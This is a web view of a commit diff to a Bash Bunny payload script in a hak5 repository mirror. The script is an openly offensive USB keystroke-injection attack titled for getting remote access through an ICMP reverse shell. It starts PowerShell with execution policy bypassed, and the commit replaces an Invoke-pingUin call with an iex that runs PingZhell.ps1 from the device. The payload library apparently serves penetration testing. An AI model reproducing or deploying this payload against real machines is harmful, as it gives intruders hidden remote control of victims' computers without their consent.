hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update payload.txt

Browse Source
This commit is contained in:
0iphor13 2021-12-23 13:16:42 +01:00 committed by GitHub
parent 979bdbc179
commit 2ce8e8f034
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
payloads/library/remote_access/pingUinBunny/payload.txt
View File

@ -1,9 +1,9 @@
#!/bin/bash
#
# Title: pingUinBunny
# Title: PingZhellBunny
# Description: Get remote access using a icmp reverse shell.
# Author: 0iphor13
# Version: 1.0
# Version: 1.3
# Category: Remote_Access
# Attackmodes: HID, Storage
@ -22,21 +22,17 @@ ATTACKMODE HID STORAGE
LED STAGE1
#After you have adapted the delays for your target, add "-W hidden"
DELAY 5000
RUN WIN "powershell -Exec Bypass"
RUN WIN "powershell -Exec Bypass -NoP -NonI"
DELAY 6000
Q ENTER
DELAY 10000
Q STRING "Import-Module ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Invoke-pingUin.ps1')"
DELAY 10000
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')"
DELAY 20000
Q ENTER
DELAY 10000
Q STRING "Invoke-pingUin -IpAddress 0.0.0.0"
DELAY 10000
Q ENTER
DELAY 5000
ATTACKMODE HID